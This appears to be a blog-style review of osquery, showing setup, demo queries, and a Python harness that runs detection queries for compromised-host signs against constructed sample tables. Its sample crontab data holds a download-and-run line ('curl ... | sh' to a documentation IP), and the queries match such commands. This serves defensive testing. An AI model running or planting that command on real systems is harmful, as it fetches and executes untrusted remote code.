
OSquery

Introduction

osquery exposes operating-system state through one uniform query interface: you can ignore differences between systems and use SQL to fetch basic facts such as processes and CPU details. Heterogeneous information from many sources is normalised into structured tables.

Setup

The project ships a Vagrantfile, so a single vagrant up builds the environment; you can then try osquery out inside the VM.

vagrant up centos
vagrant ssh centos

Then run the build:

cd /vagrant
sudo make deps
make
make package

Demo

osquery> .tables
=> bash_history
=> cpuid
=> crontab
=> etc_hosts
=> groups
=> kernel_modules
=> last
=> mounts
=> passwd_changes
=> pci_devices
=> process_envs
=> process_open_files
=> processes
=> routes
=> rpm_packages
=> suid_bin
=> time
=> users

osquery> SELECT * FROM processes LIMIT 5;

+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+
| name        | path | cmdline    | pid | on_disk | wired_size | resident_size | phys_footprint | user_time | system_time | start_time | parent |
+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+
| init        |      | /sbin/init | 1   | -1      |            | 1488          | 19232          | 4         | 72          | 1          | 0      |
| kthreadd    |      |            | 2   | -1      |            | 0             | 0              | 0         | 2           | 1          | 0      |
| migration/0 |      |            | 3   | -1      |            | 0             | 0              | 0         | 81          | 3          | 2      |
| ksoftirqd/0 |      |            | 4   | -1      |            | 0             | 0              | 0         | 391         | 3          | 2      |
| migration/0 |      |            | 5   | -1      |            | 0             | 0              | 0         | 0           | 3          | 2      |
+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+

osquery> SELECT * FROM time;

+------+---------+---------+
| hour | minutes | seconds |
+------+---------+---------+
| 18   | 27      | 54      |
+------+---------+---------+

osquery> SELECT * FROM users LIMIT 5;

+-----+-----+----------+-------------+----------------+---------------+
| uid | gid | username | description | directory      | shell         |
+-----+-----+----------+-------------+----------------+---------------+
| 0   | 0   | root     | root        | /root          | /bin/bash     |
| 1   | 1   | bin      | bin         | /bin           | /sbin/nologin |
| 2   | 2   | daemon   | daemon      | /sbin          | /sbin/nologin |
| 3   | 4   | adm      | adm         | /var/adm       | /sbin/nologin |
| 4   | 7   | lp       | lp          | /var/spool/lpd | /sbin/nologin |
+-----+-----+----------+-------------+----------------+---------------+

osquery> SELECT * FROM etc_hosts;

+-----------+--------------------------------------------------------------------+
| address   | hostnames                                                          |
+-----------+--------------------------------------------------------------------+
| 127.0.0.1 | localhost localhost.localdomain localhost4 localhost4.localdomain4 |
| ::1       | localhost localhost.localdomain localhost6 localhost6.localdomain6 |
+-----------+--------------------------------------------------------------------+

osquery> SELECT * FROM kernel_modules LIMIT 5;

+------------+--------+------------------+--------+--------------------+
| name       | size   | used_by          | status | address            |
+------------+--------+------------------+--------+--------------------+
| vboxsf     | 37631  | -                | Live   | 0x0000000000000000 |
| ipv6       | 317340 | -                | Live   | 0x0000000000000000 |
| ppdev      | 8537   | -                | Live   | 0x0000000000000000 |
| parport_pc | 22690  | -                | Live   | 0x0000000000000000 |
| parport    | 36209  | ppdev,parport_pc | Live   | 0x0000000000000000 |
+------------+--------+------------------+--------+--------------------+

osquery> SELECT * FROM mounts LIMIT 4;

+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---------+-------------+
| fsname   | fsname_real | path  | type     | opts                                                         | freq | passno | block_size | blocks  | blocks_free | blocks_avail | inodes  | inodes_free |
+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---------+-------------+
| rootfs   | rootfs      | /     | rootfs   | rw                                                           | 0    | 0      | 4096       | 9960294 | 9454499     | 8948541      | 2531328 | 2467810     |
| proc     | proc        | /proc | proc     | rw,relatime                                                  | 0    | 0      | 4096       | 0       | 0           | 0            | 0       | 0           |
| sysfs    | sysfs       | /sys  | sysfs    | rw,seclabel,relatime                                         | 0    | 0      | 4096       | 0       | 0           | 0            | 0       | 0           |
| devtmpfs | devtmpfs    | /dev  | devtmpfs | rw,seclabel,relatime,size=1952476k,nr_inodes=488119,mode=755 | 0    | 0      | 4096       | 488119  | 488079      | 488079       | 488119  | 487511      |
+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---------+-------------+

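The tables above become useful for security work once you join and filter them rather than just SELECT * from each. The block below is an added example, not code from this page or from the osquery project: five detection queries of the kind a security team would schedule, run against stand-in copies of the processes, users, suid_bin and crontab tables. Because osquery serves its tables through SQLite, the SELECT statements are what you would type into osqueryi; the sqlite3 scaffolding and the sample rows are constructed here so the queries can be executed and checked offline. Assumptions: the processes.uid column (present in current osquery, not printed by the older build in the demo above), and the sample host state, which is invented. Note also that the demo output above reports on_disk = -1 (unknown) for every process, so the deleted-binary check only produces findings on a build that fills that column.

```python
"""osquery serves its tables through SQLite, so host-state detections are plain SQL.
The queries below are ones a security team would schedule against osqueryd; to run
them offline, the relevant column subsets of processes, users, suid_bin and crontab
are rebuilt here in an in-memory sqlite3 database with constructed rows."""
import sqlite3

# Column subsets of the real osquery tables. processes.uid is assumed from the
# current osquery schema; the older build shown above does not print it.
SCHEMA = """
CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT, cmdline TEXT,
                        uid INTEGER, on_disk INTEGER, parent INTEGER);
CREATE TABLE users (uid INTEGER, gid INTEGER, username TEXT, directory TEXT, shell TEXT);
CREATE TABLE suid_bin (path TEXT, username TEXT, groupname TEXT);
CREATE TABLE crontab (command TEXT, path TEXT);
"""

# Constructed host state (not captured from a real machine): ordinary rows plus
# one planted finding per query.
SAMPLE_ROWS = {
    "processes": [
        (1, "init", "/sbin/init", "/sbin/init", 0, 1, 0),
        (2, "kthreadd", "", "", 0, -1, 0),  # kernel thread: no path, on_disk unknown
        (842, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D", 0, 1, 1),
        (2901, "httpd", "/usr/sbin/httpd", "/usr/sbin/httpd -DFOREGROUND", 48, 1, 1),
        (3117, "kworker", "/tmp/.x/kworker", "/tmp/.x/kworker", 0, 0, 1),  # unlinked after exec
        (4410, "sh", "/bin/sh", "sh -i", 48, 1, 2901),  # shell spawned by the web server
    ],
    "users": [
        (0, 0, "root", "/root", "/bin/bash"),
        (1, 1, "bin", "/bin", "/sbin/nologin"),
        (48, 48, "apache", "/var/www", "/sbin/nologin"),
        (1000, 1000, "deploy", "/home/deploy", "/bin/bash"),
        (0, 0, "toor", "/", "/bin/sh"),  # second uid-0 account
    ],
    "suid_bin": [
        ("/usr/bin/passwd", "root", "root"),
        ("/usr/bin/sudo", "root", "root"),
        ("/home/deploy/.cache/helper", "root", "root"),  # setuid root outside system paths
    ],
    "crontab": [
        ("/usr/bin/logrotate /etc/logrotate.conf", "/etc/crontab"),
        ("curl -s http://203.0.113.7/a.sh | sh", "/var/spool/cron/deploy"),  # download-and-run
    ],
}

QUERIES = {
    # Executable deleted after the process started. on_disk is -1 when osquery cannot
    # tell (every row in the demo output above), so only 0 counts as a finding.
    "deleted_binary_processes":
        "SELECT pid, name, path FROM processes WHERE on_disk = 0",
    # Any account that resolves to uid 0 but is not root.
    "extra_root_accounts":
        "SELECT uid, username, shell FROM users WHERE uid = 0 AND username != 'root'",
    # setuid binaries outside the directories a package manager installs to.
    "suid_outside_system_paths":
        "SELECT path, username FROM suid_bin "
        "WHERE path NOT LIKE '/bin/%' AND path NOT LIKE '/sbin/%' AND path NOT LIKE '/usr/%'",
    # Cron jobs that fetch and execute remote content or run from /tmp.
    "download_and_run_cron":
        "SELECT command, path FROM crontab "
        "WHERE command LIKE '%curl%' OR command LIKE '%wget%' OR command LIKE '%/tmp/%'",
    # Cross-table join: an interactive shell running under a no-login service account.
    "shell_under_service_account":
        "SELECT p.pid, p.name, u.username FROM processes p JOIN users u ON p.uid = u.uid "
        "WHERE u.shell LIKE '%nologin%' AND p.name IN ('sh', 'bash', 'dash')",
}


def load_sample_db(rows=SAMPLE_ROWS):
    """Create the stand-in tables in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, values in rows.items():
        placeholders = ",".join("?" * len(values[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({placeholders})", values)
    return conn


def run_detections(conn):
    """Run every query and return {query_name: [matching rows]}."""
    return {name: conn.execute(sql).fetchall() for name, sql in QUERIES.items()}


if __name__ == "__main__":
    for name, hits in run_detections(load_sample_db()).items():
        print(f"{name}: {len(hits)} hit(s)")
        for hit in hits:
            print("   ", hit)
```

The SELECT statements run unchanged in osqueryi or as scheduled queries in an osqueryd configuration; only the sqlite3 setup is specific to this offline harness. One caveat worth keeping in mind when joining on uid: the users table can legitimately hold two rows with the same uid (root and toor in the sample), and a join on uid then duplicates every matching process row, which is why the uid-0 check above is written as a plain filter on users rather than as a join.
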
Pros & Cons

  • Pros:
    • Uniform interface
    • Basic documentation is adequate
  • Cons:
    • C++ project
    • Few tables, and some built-in ones do not work (querying the rpm_packages table errors out and exits)

Summary

In-house monitoring systems are usually built case by case and are not expected to handle most distributions; supporting the systems that actually run in production is normally enough. Collecting metrics that differ from system to system is tedious, but it helps you understand your applications. This project is highly compatible with Mac OS X and friendly to a Mac development environment. A uniform interface and the pull of a large company may attract a community response, though for now it does not look like enough.